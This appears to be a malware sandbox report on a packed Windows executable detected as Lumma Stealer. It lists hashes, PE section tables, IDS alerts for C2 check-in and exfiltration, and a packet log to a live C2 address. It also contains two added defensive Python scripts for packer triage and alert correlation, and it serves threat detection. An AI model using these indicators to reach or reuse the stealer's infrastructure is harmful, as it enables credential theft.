SHA256: 0da0539837800ea38bae7556cd5ffe4d45fb0d1135253e85801645bc7fa6cfec
SHA512: e99e2d0950471bd1be9ad38a6b3111878bb5ab53f9c42d2b5bef9aa9add57ebc5e6d684e2598d18a346593571cbee9f75b2fa5aa5f5a5cebe925a43e7ace9a5a
SSDEEP: 24576:fn5nkVcg0iwDKpJvb5Qn6nN/LYrUUulLex+qZgLAYOxTdF0SCpwZMrS61wRBUih:fnAsDwJj5ZNjFU+NqZgMDxgSCpZ4BUE
TLSH: 588533A21501F1C8C4EDB23717BB07F579B47266C7EB49E005121B60AAFE623793DAB1
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig.............................@I...........@..........................pI...........@.................................Y@..m..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x894000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              xor byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add dword ptr [eax+00000000h], eax
                                                                                                              add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x54059          0x6d          .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x53000          0x1ac         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x541f8          0x8           .idata
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name              Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type                 Entropy             Characteristics
(name not shown)  0x1000           0x52000       0x2640    0d3c97257bba7a26921c28f9c3482a8d  False     0.9995915032679739   OpenPGP Public Key        7.984706196214209   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc             0x53000          0x1ac         0x200     c4249243ceaeb236e3ce8ce2ab2c9a69  False     0.5390625            data                      5.249019796122045   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata            0x54000          0x1000        0x200     39a711a7d804ccbc2a14eea65cf3c27e  False     0.154296875          data                      1.0789976601211375  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(name not shown)  0x55000          0x2a3000      0x200     f6e5c3c629318e647c2a88381400f746  unknown   unknown              unknown                   unknown             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
uezamyof          0x2f8000         0x19b000      0x19ae00  527dc4d88bf17c4bed4282e8cb40b5f4  False     0.9945773596744752   data                      7.953990333526645   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
cvgltxxf          0x493000         0x1000        0x400     6952ed6de1356090c48bbb4a4d1695b9  False     0.767578125          data                      6.088224853241777   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant          0x494000         0x3000        0x2200    3a37c56837ec014d2b64d3f82b5c7542  False     0.07479319852941177  DOS executable (COM)      0.7797965417131786  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name         RVA      Size   Type                                    Language  Country  ZLIB Complexity
RT_MANIFEST  0x53058  0x152  ASCII text, with CRLF line terminators                     0.6479289940828402
DLL           Import
kernel32.dll  lstrcpy
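The section and import tables above carry the classic static signs of a packed loader: unnamed and randomly named sections that are readable, writable and executable at once, entropy close to 8.0 in the sections that hold the payload, an unnamed section whose virtual size (0x2a3000) dwarfs its raw size (0x200), and an import table that resolves a single API (kernel32!lstrcpy). The script below turns those observations into a repeatable triage check. It is an added example and not Joe Sandbox code; the flag values are the standard winnt.h section characteristics, while the thresholds (HIGH_ENTROPY, VSIZE_RATIO), the list of common section names and the section records constructed in demo() are assumptions modeled on the table rather than parsed from the file.

```python
"""PE section triage in the spirit of the section and import tables above.
Added example (not Joe Sandbox code); thresholds and the demo() records are
assumptions modeled on the report, not parsed from the sample."""
import math
import random
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Section characteristic flags, as defined in winnt.h.
IMAGE_SCN_CNT_CODE             = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE          = 0x20000000
IMAGE_SCN_MEM_READ             = 0x40000000
IMAGE_SCN_MEM_WRITE            = 0x80000000

# Names a stock toolchain emits; anything else is worth a second look (assumed list).
COMMON_SECTION_NAMES = {".text", ".rdata", ".data", ".idata", ".edata", ".rsrc",
                        ".reloc", ".bss", ".tls", ".pdata", ".CRT"}
HIGH_ENTROPY = 7.0   # bits/byte; compressed or encrypted data sits near 8.0 (assumed threshold)
VSIZE_RATIO = 8      # virtual/raw size ratio that suggests an unpack buffer (assumed threshold)


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for empty or constant input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def random_blob(size: int, seed: int = 1) -> bytes:
    """Deterministic pseudo-random bytes, standing in for a packed payload."""
    return random.Random(seed).randbytes(size)


@dataclass
class Section:
    name: str
    virtual_size: int
    raw_size: int
    characteristics: int
    entropy: Optional[float] = None   # value taken from a report, used when raw_data is absent
    raw_data: bytes = b""             # on-disk bytes, if the file itself is available


def section_findings(sec: Section) -> List[str]:
    """Reasons this section looks like packer or loader output; an empty list means nothing notable."""
    findings = []
    ch = sec.characteristics
    if ch & IMAGE_SCN_MEM_WRITE and ch & IMAGE_SCN_MEM_EXECUTE:
        findings.append("writable+executable (self-modifying code or unpack target)")
    if ch & IMAGE_SCN_MEM_EXECUTE and not ch & IMAGE_SCN_CNT_CODE:
        findings.append("executable but not flagged as code")
    ent = shannon_entropy(sec.raw_data) if sec.raw_data else (sec.entropy or 0.0)
    if sec.raw_size > 0 and ent > HIGH_ENTROPY:
        findings.append(f"high entropy {ent:.2f} (compressed or encrypted payload)")
    if sec.virtual_size >= 0x10000 and sec.virtual_size > VSIZE_RATIO * max(sec.raw_size, 1):
        findings.append("virtual size far exceeds raw size (room reserved for an unpacked image)")
    name = sec.name.rstrip("\x00")
    if not name or not name.isprintable():
        findings.append("empty or unprintable section name")
    elif name not in COMMON_SECTION_NAMES:
        findings.append(f"non-standard section name {name!r}")
    return findings


def import_findings(imports: Dict[str, List[str]]) -> List[str]:
    """A near-empty import table means the real API set is resolved at runtime."""
    total = sum(len(v) for v in imports.values())
    if total <= 3:
        return [f"only {total} import(s); expect GetProcAddress or hash-based API resolution"]
    return []


def triage(sections: List[Section], imports: Dict[str, List[str]]) -> dict:
    """Per-section findings plus an overall packed verdict (RWX and high entropy in one section)."""
    per_section: List[Tuple[str, List[str]]] = [
        (s.name.rstrip("\x00") or "<unnamed>", section_findings(s)) for s in sections
    ]
    likely_packed = any(
        any(f.startswith("writable+executable") for f in fs)
        and any(f.startswith("high entropy") for f in fs)
        for _, fs in per_section
    )
    return {"sections": per_section, "imports": import_findings(imports),
            "likely_packed": likely_packed}


def demo() -> dict:
    """Constructed section records modeled on the table above (RWX = read, write, execute)."""
    RWX = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    RW = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    sections = [
        Section("",         0x52000,  0x2640,   RWX, entropy=7.98),
        Section(".rsrc",    0x1ac,    0x200,    RW,  entropy=5.25),
        Section(".idata",   0x1000,   0x200,    RW,  entropy=1.08),
        Section("",         0x2a3000, 0x200,    RWX, entropy=0.0),
        Section("uezamyof", 0x19b000, 0x19ae00, RWX, raw_data=random_blob(0x1000)),
        Section(".taggant", 0x3000,   0x2200,   RWX, entropy=0.78),
    ]
    return triage(sections, {"kernel32.dll": ["lstrcpy"]})


if __name__ == "__main__":
    for name, findings in demo()["sections"]:
        print(f"{name:12s} {'; '.join(findings) or 'ok'}")
```

On a real file the same checks apply to the bytes of each section (pass raw_data instead of a reported entropy); note that libmagic's "OpenPGP Public Key" label on the first section is the usual misidentification of high-entropy data and should not be read as a real key block.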
Timestamp                        SID      Signature                                                                        Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2024-12-27T09:00:16.122859+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                        3         192.168.2.8  49705        172.67.165.185  443        TCP
2024-12-27T09:00:16.843983+0100  2049836  ET MALWARE Lumma Stealer Related Activity                                        1         192.168.2.8  49705        172.67.165.185  443        TCP
2024-12-27T09:00:16.843983+0100  2054653  ET MALWARE Lumma Stealer CnC Host Checkin                                        1         192.168.2.8  49705        172.67.165.185  443        TCP
2024-12-27T09:00:18.065792+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                        3         192.168.2.8  49706        172.67.165.185  443        TCP
2024-12-27T09:00:19.055605+0100  2049812  ET MALWARE Lumma Stealer Related Activity M2                                     1         192.168.2.8  49706        172.67.165.185  443        TCP
2024-12-27T09:00:19.055605+0100  2054653  ET MALWARE Lumma Stealer CnC Host Checkin                                        1         192.168.2.8  49706        172.67.165.185  443        TCP
2024-12-27T09:00:20.802751+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                        3         192.168.2.8  49707        172.67.165.185  443        TCP
2024-12-27T09:00:21.686754+0100  2048094  ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration                            1         192.168.2.8  49707        172.67.165.185  443        TCP
2024-12-27T09:00:23.053569+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                        3         192.168.2.8  49708        172.67.165.185  443        TCP
2024-12-27T09:00:25.371174+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                        3         192.168.2.8  49709        172.67.165.185  443        TCP
2024-12-27T09:00:27.986135+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                        3         192.168.2.8  49710        172.67.165.185  443        TCP
2024-12-27T09:00:31.192538+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                        3         192.168.2.8  49711        172.67.165.185  443        TCP
2024-12-27T09:00:31.197541+0100  2843864  ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2   1         192.168.2.8  49711        172.67.165.185  443        TCP
2024-12-27T09:00:34.719114+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update                        3         192.168.2.8  49715        172.67.165.185  443        TCP
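Every connection in the alert table trips the severity-3 JA3 fingerprint rule, but only some of those flows also trip a severity-1 Lumma signature (C2 check-in, exfiltration, the zipped screen. upload). A JA3 hash alone identifies a TLS client stack, not malware, so a sensible pipeline escalates a flow only when a higher-confidence rule fires on the same 5-tuple, and blocks a destination only when at least one of its flows is confirmed. The script below does that over Suricata eve.json alert records. It is an added example, not part of the Joe Sandbox report; the eve.json lines are constructed to mirror four rows of the table above plus one non-alert event, and the choice of which SIDs count as "noisy" is an assumption.

```python
"""Escalate Suricata JA3-only hits to confirmed flows by correlating per 5-tuple.
Added example, not Joe Sandbox code; EVE_LINES are constructed to mirror the
alert table above, and NOISY_SIDS is an assumed tuning choice."""
import json
from collections import defaultdict
from typing import Dict, Iterator, List, Tuple

# Signatures that fingerprint a TLS client but do not by themselves prove malware (assumption).
NOISY_SIDS = {2028371}

# Constructed eve.json records in the field layout Suricata emits for event_type "alert".
EVE_LINES = """\
{"timestamp":"2024-12-27T09:00:16.122859+0100","event_type":"alert","src_ip":"192.168.2.8","src_port":49705,"dest_ip":"172.67.165.185","dest_port":443,"proto":"TCP","alert":{"signature_id":2028371,"signature":"ET JA3 Hash - Possible Malware - Fake Firefox Font Update","severity":3}}
{"timestamp":"2024-12-27T09:00:16.843983+0100","event_type":"alert","src_ip":"192.168.2.8","src_port":49705,"dest_ip":"172.67.165.185","dest_port":443,"proto":"TCP","alert":{"signature_id":2054653,"signature":"ET MALWARE Lumma Stealer CnC Host Checkin","severity":1}}
{"timestamp":"2024-12-27T09:00:23.053569+0100","event_type":"alert","src_ip":"192.168.2.8","src_port":49708,"dest_ip":"172.67.165.185","dest_port":443,"proto":"TCP","alert":{"signature_id":2028371,"signature":"ET JA3 Hash - Possible Malware - Fake Firefox Font Update","severity":3}}
{"timestamp":"2024-12-27T09:00:31.197541+0100","event_type":"alert","src_ip":"192.168.2.8","src_port":49711,"dest_ip":"172.67.165.185","dest_port":443,"proto":"TCP","alert":{"signature_id":2843864,"signature":"ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2","severity":1}}
{"timestamp":"2024-12-27T09:00:40.000000+0100","event_type":"flow","src_ip":"192.168.2.8","src_port":49715,"dest_ip":"172.67.165.185","dest_port":443,"proto":"TCP"}
"""

FlowKey = Tuple[str, int, str, int, str]


def parse_alerts(eve_text: str) -> Iterator[dict]:
    """Yield alert events from eve.json text, skipping other event types and unparseable lines."""
    for line in eve_text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(ev, dict) and ev.get("event_type") == "alert" and "alert" in ev:
            yield ev


def flow_key(ev: dict) -> FlowKey:
    """The 5-tuple Suricata alerts share when they fire on the same connection."""
    return (ev["src_ip"], ev["src_port"], ev["dest_ip"], ev["dest_port"], ev["proto"])


def group_by_flow(events: Iterator[dict]) -> Dict[FlowKey, List[dict]]:
    flows: Dict[FlowKey, List[dict]] = defaultdict(list)
    for ev in events:
        flows[flow_key(ev)].append(ev)
    return flows


def classify_flow(events: List[dict]) -> str:
    """'confirmed' if any non-noisy signature fired on the flow, else 'ja3-only'."""
    sids = {e["alert"]["signature_id"] for e in events}
    return "confirmed" if sids - NOISY_SIDS else "ja3-only"


def escalate(eve_text: str) -> Dict[FlowKey, dict]:
    """Per-flow verdict, best (lowest) severity seen, and the distinct signatures involved."""
    result = {}
    for key, events in group_by_flow(parse_alerts(eve_text)).items():
        result[key] = {
            "verdict": classify_flow(events),
            "min_severity": min(e["alert"]["severity"] for e in events),
            "signatures": sorted({e["alert"]["signature"] for e in events}),
        }
    return result


def hosts_to_block(eve_text: str) -> List[str]:
    """Destination IPs with at least one confirmed flow; a JA3-only hit never blocks on its own."""
    return sorted({key[2] for key, info in escalate(eve_text).items()
                   if info["verdict"] == "confirmed"})


if __name__ == "__main__":
    for key, info in escalate(EVE_LINES).items():
        print(f"{key[0]}:{key[1]} -> {key[2]}:{key[3]}  {info['verdict']:9s} sev={info['min_severity']}")
    print("block:", hosts_to_block(EVE_LINES))
```

With the report's own data the result is that 172.67.165.185 is blocked because flows 49705, 49706, 49707 and 49711 are confirmed, while the JA3-only flows on 49708, 49709, 49710 and 49715 ride along as supporting context rather than as independent detections.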
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Dec 27, 2024 09:00:14.896089077 CET  49705        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:14.896120071 CET  443          49705      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:14.896203995 CET  49705        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:14.899739027 CET  49705        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:14.899751902 CET  443          49705      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:16.122802973 CET  443          49705      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:16.122859001 CET  49705        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:16.125381947 CET  49705        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:16.125390053 CET  443          49705      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:16.125631094 CET  443          49705      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:16.172046900 CET  49705        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:16.179274082 CET  49705        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:16.179316044 CET  49705        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:16.179431915 CET  443          49705      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:16.843990088 CET  443          49705      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:16.844089031 CET  443          49705      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:16.844207048 CET  49705        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:16.847062111 CET  49705        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:16.847073078 CET  443          49705      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:16.855457067 CET  49706        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:16.855494022 CET  443          49706      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:16.855572939 CET  49706        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:16.855844975 CET  49706        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:16.855856895 CET  443          49706      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:18.065680027 CET  443          49706      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:18.065792084 CET  49706        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:18.294152021 CET  49706        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:18.294178009 CET  443          49706      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:18.294509888 CET  443          49706      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:18.304586887 CET  49706        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:18.304632902 CET  49706        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:18.304661036 CET  443          49706      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:19.055610895 CET  443          49706      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:19.055665016 CET  443          49706      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:19.055694103 CET  443          49706      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:19.055718899 CET  443          49706      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:19.055742979 CET  443          49706      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:19.055768967 CET  49706        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:19.055768967 CET  49706        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:19.055789948 CET  443          49706      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:19.055852890 CET  49706        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:19.063836098 CET  443          49706      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:19.072223902 CET  443          49706      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:19.072272062 CET  49706        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:19.072303057 CET  443          49706      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:19.125150919 CET  49706        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:19.125164986 CET  443          49706      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:19.172045946 CET  49706        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:19.175421953 CET  443          49706      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:19.179217100 CET  443          49706      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:19.179389954 CET  49706        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:19.179402113 CET  443          49706      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:19.218916893 CET  49706        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:19.247098923 CET  443          49706      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:19.250952959 CET  443          49706      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:19.251030922 CET  49706        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:19.251044035 CET  443          49706      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:19.251116037 CET  49706        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:19.251246929 CET  49706        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:19.251246929 CET  49706        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:19.251271963 CET  443          49706      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:19.251276016 CET  443          49706      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:19.465624094 CET  49707        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:19.465663910 CET  443          49707      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:19.465815067 CET  49707        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:19.466109991 CET  49707        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:19.466123104 CET  443          49707      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:20.802658081 CET  443          49707      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:20.802751064 CET  49707        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:20.825190067 CET  49707        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:20.825210094 CET  443          49707      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:20.825642109 CET  443          49707      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:20.831043959 CET  49707        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:20.831321001 CET  49707        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:20.831362963 CET  443          49707      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:21.686768055 CET  443          49707      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:21.686908007 CET  443          49707      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:21.686950922 CET  49707        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:21.687048912 CET  49707        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:21.687058926 CET  443          49707      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:21.842484951 CET  49708        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:21.842529058 CET  443          49708      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:21.842624903 CET  49708        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:21.842967987 CET  49708        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:21.842982054 CET  443          49708      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:23.053503990 CET  443          49708      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:23.053569078 CET  49708        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:23.055058956 CET  49708        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:23.055066109 CET  443          49708      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:23.055320024 CET  443          49708      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:23.057224989 CET  49708        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:23.057224989 CET  49708        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:23.057260990 CET  443          49708      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:23.057337999 CET  49708        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:23.103336096 CET  443          49708      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:23.871602058 CET  443          49708      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:23.871707916 CET  443          49708      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:23.871782064 CET  49708        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:23.872025013 CET  49708        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:23.872035980 CET  443          49708      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:24.067023039 CET  49709        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:24.067091942 CET  443          49709      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:24.067164898 CET  49709        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:24.067543983 CET  49709        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:24.067557096 CET  443          49709      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:25.371052980 CET  443          49709      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:25.371174097 CET  49709        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:25.372478008 CET  49709        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:25.372487068 CET  443          49709      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:25.372739077 CET  443          49709      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:25.373991013 CET  49709        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:25.374123096 CET  49709        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:25.374149084 CET  443          49709      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:25.374203920 CET  49709        443        192.168.2.8      172.67.165.185
Dec 27, 2024 09:00:25.374209881 CET  443          49709      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:26.356674910 CET  443          49709      172.67.165.185   192.168.2.8
Dec 27, 2024 09:00:26.356971025 CET  443          49709      172.67.165.185   192.168.2.8
                                                                                                              Dec 27, 2024 09:00:26.357060909 CET49709443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:26.357130051 CET49709443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:26.357148886 CET44349709172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:26.678164005 CET49710443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:26.678199053 CET44349710172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:26.678267002 CET49710443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:26.678620100 CET49710443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:26.678634882 CET44349710172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:27.985964060 CET44349710172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:27.986135006 CET49710443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:27.995012999 CET49710443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:27.995026112 CET44349710172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:27.995452881 CET44349710172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:27.997028112 CET49710443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:27.997134924 CET49710443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:27.997142076 CET44349710172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:29.429728985 CET44349710172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:29.429986000 CET44349710172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:29.430072069 CET49710443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:29.430135965 CET49710443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:29.430151939 CET44349710172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:29.888955116 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:29.889017105 CET44349711172.67.165.185192.168.2.8
                                                                                                              Dec 27, 2024 09:00:29.889096022 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:29.889451981 CET49711443192.168.2.8172.67.165.185
                                                                                                              Dec 27, 2024 09:00:29.889462948 CET44349711172.67.165.185192.168.2.8
